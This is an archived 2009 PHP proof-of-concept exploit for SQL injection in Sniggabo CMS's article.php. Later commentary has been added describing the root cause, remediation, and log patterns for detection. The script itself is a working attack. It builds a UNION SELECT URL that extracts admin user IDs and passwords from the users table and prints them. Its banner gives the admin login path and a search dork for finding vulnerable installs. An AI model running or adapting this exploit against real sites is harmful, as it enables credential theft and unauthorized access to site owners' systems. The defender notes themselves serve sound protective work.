# Title : Sniggabo CMS (article.php id) Remote SQL Injection Exploit
# Published : 2009-06-11
# Author : Lidloses_Auge
<?php
// Archived proof-of-concept (2009-06-11) for a SQL injection reachable through
// article.php in Sniggabo CMS. The script prints a usage banner, builds one
// crafted URL from the first CLI argument, fetches it, and prints two fields
// cut out of the response body.
//
// Defender notes (review):
// - Root cause, inferred from the payload only: article.php appears to place
//   the request parameter into a SQL statement without parameter binding or
//   an integer cast. The application source is not shown here; confirm there.
// - Remediation in the application: bind the article id through a prepared
//   statement (or cast to int and reject anything else), run the site with a
//   database account that cannot read the users table unless it has to, and
//   store only salted password hashes (e.g. password_hash()).
// - The banner names the admin login path and a search-engine string for
//   finding installs, so exposed instances should be assumed discoverable:
//   restrict access to the admin login and rotate admin credentials if the
//   log pattern described below shows up.
print_r('
################################################
Sniggabo CMS - Remote SQL Injection Exploit
Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Homepage: http://www.novusec.com
Greetz to: -=Player=- , Suicide, enco,
Palme, GPM, karamble, Free-Hack
Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id
Use: php '.$argv[0].' http://www.site.com
################################################
');
// The base URL is taken from $argv[1] without checking that it was supplied.
// The query string replaces the article id with a UNION SELECT that returns
// userid and password from the users table, wrapped in "::" separators
// (0x3a3a is "::", 0x313a3a is "1::").
// Detection: in web access logs, look for article.php requests whose query
// string contains "union+select", "concat(", "from+users" or the hex literals
// above, and for responses carrying the "1::" marker. The parameter is written
// "Id" here but "id" in the title and banner, so match it case-insensitively.
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
// Single HTTP GET through PHP's URL wrapper; the return value is not checked,
// so a failed request leaves $src as false.
$src = file_get_contents($url);
// Cuts the whole response body on "::"; with the separators above, index 1 is
// the userid value and index 2 the password value.
$data = split("::",$src);
// Prints the two extracted fields. Whatever the users.password column holds is
// what leaks; SOURCE does not show whether the CMS hashes it.
echo "Admin: $data[1]nPassword: $data[2]n";
?>